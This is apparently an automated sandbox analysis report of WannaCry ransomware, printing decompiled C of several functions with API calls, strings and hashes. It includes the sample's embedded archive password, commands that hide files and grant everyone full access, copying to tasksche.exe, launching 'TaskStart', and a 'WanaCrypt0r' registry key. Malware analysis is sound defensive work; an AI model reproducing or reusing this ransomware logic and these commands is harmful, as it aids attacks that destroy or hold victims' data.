0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
							_t73 =  &(_t79[2]);
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					if(_a12 != 0) {
						do {
							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
							_t73 =  &(_t73[1]);
							_t32 =  &_a12;
							 *_t32 = _a12 - 1;
						} while ( *_t32 != 0);
					}
					return  !_t35;
				} else {
					return 0;
				}
			}

0x00405422
0x00405427
0x00405436
0x0040543d
0x00405447
0x0040544a
0x0040544f
0x00405465
0x0040547f
0x00405496
0x004054ad
0x004054c4
0x004054db
0x00405503
0x00405505
0x00405506
0x00405506
0x0040550d
0x00405512
0x00405514
0x00405527
0x00405529
0x0040552a
0x0040552a
0x0040552a
0x00405514
0x00405534
0x00405429
0x0040542c
0x0040542c

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}

0x00401713
0x004017d8
0x00000000
0x004017d8
0x0040171b
0x00401721
0x004017d3
0x004017d5
0x00000000
0x004017d5
0x00401732
0x00401736
0x00000000
0x00000000
0x00401751
0x0040175e
0x0040176b
0x00401778
0x00401785
0x00401792
0x00401797
0x00401799
0x0040179f
0x004017a5
0x00000000
0x00000000
0x004017a7
0x004017ad
0x00000000
0x00000000
0x004017af
0x004017b5
0x00000000
0x00000000
0x004017b7
0x004017bd
0x00000000
0x00000000
0x004017bf
0x004017c5
0x00000000
0x00000000
0x004017c7
0x004017cd
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797

Strings

CloseHandle, xrefs: 0040178C
ReadFile, xrefs: 00401758
kernel32.dll, xrefs: 00401727
DeleteFileW, xrefs: 0040177F
MoveFileW, xrefs: 00401765
WriteFile, xrefs: 0040174B
CreateFileW, xrefs: 00401743
MoveFileExW, xrefs: 00401772

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
API String ID: 2238633743-1294736154
Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E

Uniqueness

Uniqueness Score: -1.00%

Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}

0x00407136
0x00407136
0x00407140
0x00407148
0x0040714a
0x00407168
0x0040716b
0x0040716e
0x00407170
0x004071b7
0x004071c8
0x004071cd
0x004071cf
0x004071d3
0x004071d8
0x004071d8
0x004071d8
0x004071dc
0x004071dd
0x004071e1
0x004071ea
0x004071ec
0x004071fa
0x00000000
0x00407206
0x00000000
0x004071e3
0x004071e3
0x00000000
0x004071e3
0x004071e1
0x00407172
0x00407175
0x00407179
0x0040717e
0x0040717e
0x0040717f
0x00407181
0x00407185
0x00407188
0x0040715e
0x00000000
0x0040718a
0x0040718a
0x0040718d
0x00407196
0x00407196
0x00407198
0x0040719b
0x004071ad
0x004071b3
0x004071b6
0x00000000
0x004071b6
0x0040719e
0x00407195
0x00000000
0x00407195
0x00407190
0x00000000
0x00407190
0x00407188
0x0040714f
0x00407210
0x00407214
0x00407218
0x0040721d
0x0040721d
0x0040721e
0x00407220
0x00407223
0x00407227
0x0040722a
0x00000000
0x00407230
0x00407230
0x00407233
0x0040723c
0x0040723c
0x0040723e
0x00407241
0x00407255
0x0040725a
0x00407261
0x0040729c
0x0040729f
0x004072a9
0x004072ac
0x004072ae
0x004072b0
0x004072b2
0x004072b2
0x004072b4
0x00000000
0x00000000
0x004072b6
0x004072b8
0x004072be
0x004072be
0x004072c1
0x004072c1
0x004072c4
0x00000000
0x004072c4
0x004072ba
0x004072bc
0x00000000
0x00000000
0x00000000
0x004072bc
0x004072cf
0x004072d5
0x004072d8
0x00407347
0x0040734f
0x00407356
0x0040737b
0x0040738f
0x0040739e
0x004073a3
0x00407312
0x00407312
0x0040732b
0x00407331
0x00407331
0x00407334
0x00407337
0x004073b3
0x004073b8
0x004073c0
0x004073c6
0x004073c9
0x004073ce
0x004073cf
0x004073cf
0x004073d5
0x004073d5
0x004073d5
0x004073d9
0x004073eb
0x004073ed
0x004073f0
0x004073f3
0x00000000
0x00000000
0x004073f5
0x004073f7
0x0040742a
0x0040742a
0x0040745a
0x0040745a
0x0040745e
0x00407463
0x00407463
0x0040746b
0x00000000
0x00407473
0x004073f9
0x00407415
0x00407415
0x00407419
0x00407454
0x00000000
0x00407454
0x0040741b
0x0040741d
0x00000000
0x00000000
0x00000000
0x0040741f
0x0040740b
0x00407411
0x00407413
0x00407433
0x00000000
0x00407433
0x00000000
0x00407413
0x00407421
0x00000000
0x00407421
0x00000000
0x00407339
0x00407358
0x0040735f
0x00000000
0x00000000
0x00407361
0x00407368
0x004072e1
0x004072e7
0x004072fc
0x0040730a
0x0040730f
0x00000000
0x0040730f
0x0040736e
0x00407375
0x00000000
0x00000000
0x00000000
0x00407375
0x004072da
0x004072da
0x004072da
0x00000000
0x004072da
0x004072a1
0x00000000
0x004072a1
0x00407263
0x00407266
0x00000000
0x00000000
0x0040726c
0x0040726f
0x00407271
0x00407273
0x00407283
0x00407283
0x00407284
0x00407290
0x00407290
0x00000000
0x00407296
0x00407275
0x00407277
0x00000000
0x00000000
0x00407279
0x0040727b
0x00407288
0x00407288
0x00407288
0x0040728e
0x0040728f
0x00000000
0x0040728f
0x0040727d
0x00407281
0x00000000
0x00000000
0x00000000
0x00407281
0x00407244
0x0040723b
0x00000000
0x0040723b
0x00407236
0x00000000
0x00407236
0x00000000
0x00000000
0x00000000

Strings

%s%s, xrefs: 00407389
\, xrefs: 00407358
:, xrefs: 0040736E
%s%s%s, xrefs: 004072F6

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: %s%s$%s%s%s$:$\
API String ID: 0-1100577047
Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}

0x00402040
0x00402054
0x0040208e
0x004020a3
0x004020b1
0x004020b3
0x004020bb
0x004020c3
0x004020c8
0x004020cf
0x004020d0
0x004020d5
0x004020e1
0x004020ed
0x004020f5
0x004020fa
0x004020fc
0x00402104
0x00402119
0x0040212a
0x00402134
0x0040214b
0x00402151
0x00402154
0x00402158
0x00402158
0x00402154
0x00402134
0x00402160
0x00402160
0x00000000
0x00402061
0x00402061
0x0040206f
0x0040207f
0x00000000
0x00402165
0x00402165
0x0040216b
0x0040216b
0x0040207f

APIs

__p___argv.MSVCRT(0040F538), ref: 00402040
strcmp.MSVCRT(?), ref: 0040204B
CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076

Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97

strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
strrchr.MSVCRT(?,0000005C), ref: 004020AE
SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB

Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10

Strings

attrib +h ., xrefs: 004020DC
t.wnry, xrefs: 00402125
TaskStart, xrefs: 00402145
icacls . /grant Everyone:F /T /C /Q, xrefs: 004020E8
tasksche.exe, xrefs: 00402061, 0040206D, 00402075

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
API String ID: 1074704982-2844324180
Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28

Uniqueness

Uniqueness Score: -1.00%

Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}

0x0040110f
0x00401116
0x00401118
0x0040111c
0x00401129
0x0040113a
0x0040113c
0x0040113e
0x0040114b
0x00401151
0x00401157
0x0040115c
0x00401164
0x0040116b
0x0040116c
0x00401175
0x0040116e
0x0040116e
0x0040116e
0x0040117a
0x00401183
0x0040118c
0x004011cf
0x004011e4
0x004011ee
0x004011f0
0x004011f1
0x004011fa
0x004011fa
0x0040118e
0x0040119a
0x004011bd
0x004011c7
0x004011c9
0x004011c9
0x00401203
0x0040120b
0x00401222
0x00000000
0x00000000
0x00000000
0x00000000
0x0040120b
0x0040120d
0x0040120d
0x00401210
0x00000000

APIs

wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
strlen.MSVCRT(?), ref: 004011A7
RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
RegCloseKey.ADVAPI32(00000000), ref: 00401203

Strings

0@, xrefs: 00401157
Software\, xrefs: 0040110A
WanaCrypt0r, xrefs: 00401145

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
String ID: 0@$Software\$WanaCrypt0r
API String ID: 865909632-3421300005
Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
